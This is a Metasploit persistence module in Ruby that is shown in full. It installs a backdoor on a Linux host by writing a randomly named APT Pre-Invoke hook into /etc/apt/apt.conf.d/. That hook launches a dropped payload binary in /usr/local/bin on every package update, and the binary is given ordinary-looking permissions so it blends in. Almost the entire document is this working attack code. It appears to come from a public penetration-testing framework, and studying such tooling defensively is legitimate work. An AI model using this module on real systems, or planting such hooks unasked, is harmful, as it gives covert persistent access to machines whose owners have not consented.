Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8
  include Msf::Exploit::EXE
9
  include Msf::Exploit::FileDropper
10
  include Msf::Post::File
11
  include Msf::Post::Linux::System
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'APT Package Manager Persistence',
16
      'Description'    => %q(
17
        This module will run a payload when the package manager is used. No
18
        handler is ran automatically so you must configure an appropriate
19
        exploit/multi/handler to connect. This module creates a pre-invoke hook
20
        for APT in apt.conf.d. The hook name syntax is numeric followed by text.
21
      ),
22
      'License'        => MSF_LICENSE,
23
      'Author'         => ['Aaron Ringo'],
24
      'Platform'       => ['linux', 'unix'],
25
      'Arch'           =>
26
        [
27
          ARCH_CMD,
28
          ARCH_X86,
29
          ARCH_X64,
30
          ARCH_ARMLE,
31
          ARCH_AARCH64,
32
          ARCH_PPC,
33
          ARCH_MIPSLE,
34
          ARCH_MIPSBE
35
        ],
36
      'SessionTypes'   => ['shell', 'meterpreter'],
37
      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true },
38
      'DisclosureDate' => '1999-03-09', # Date APT package manager was included in Debian
39
      'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
40
      'Targets'        => [['Automatic', {}]],
41
      'DefaultTarget'  => 0
42
    ))
43

44
    register_options(
45
      [
46
        OptString.new('HOOKNAME', [false, 'Name of hook file to write']),
47
        OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
48
      ])
49

50
    register_advanced_options(
51
      [
52
        OptString.new('WritableDir', [true, 'A directory where we can write files', '/usr/local/bin/'])
53
      ])
54
  end
55

56
  def exploit
57
    hook_path = '/etc/apt/apt.conf.d/'
58
    unless writable? hook_path
59
      fail_with Failure::BadConfig, "#{hook_path} not writable, or APT is not on system"
60
    end
61
    hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")
62

63
    backdoor_path = datastore['WritableDir']
64
    unless writable? backdoor_path
65
      fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
66
    end
67
    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
68
    backdoor_path << backdoor_name
69

70
    print_status('Attempting to write hook:')
71
    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} 2>/dev/null &\"};"
72
    write_file(hook_path, hook_script)
73

74
    unless exist? hook_path
75
      fail_with Failure::Unknown, 'Failed to write Hook'
76
    end
77
    print_status("Wrote #{hook_path}")
78

79
    if payload.arch.first == 'cmd'
80
      write_file(backdoor_path, payload.encoded)
81
    else
82
      write_file(backdoor_path, generate_payload_exe)
83
    end
84

85
    unless exist? backdoor_path
86
      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
87
    end
88
    print_status("Backdoor uploaded #{backdoor_path}")
89
    print_status('Backdoor will run on next APT update')
90

91
    # permissions chosen to reflect common perms in /usr/local/bin/
92
    chmod(backdoor_path, 0755)
93
  end
94
end
95

96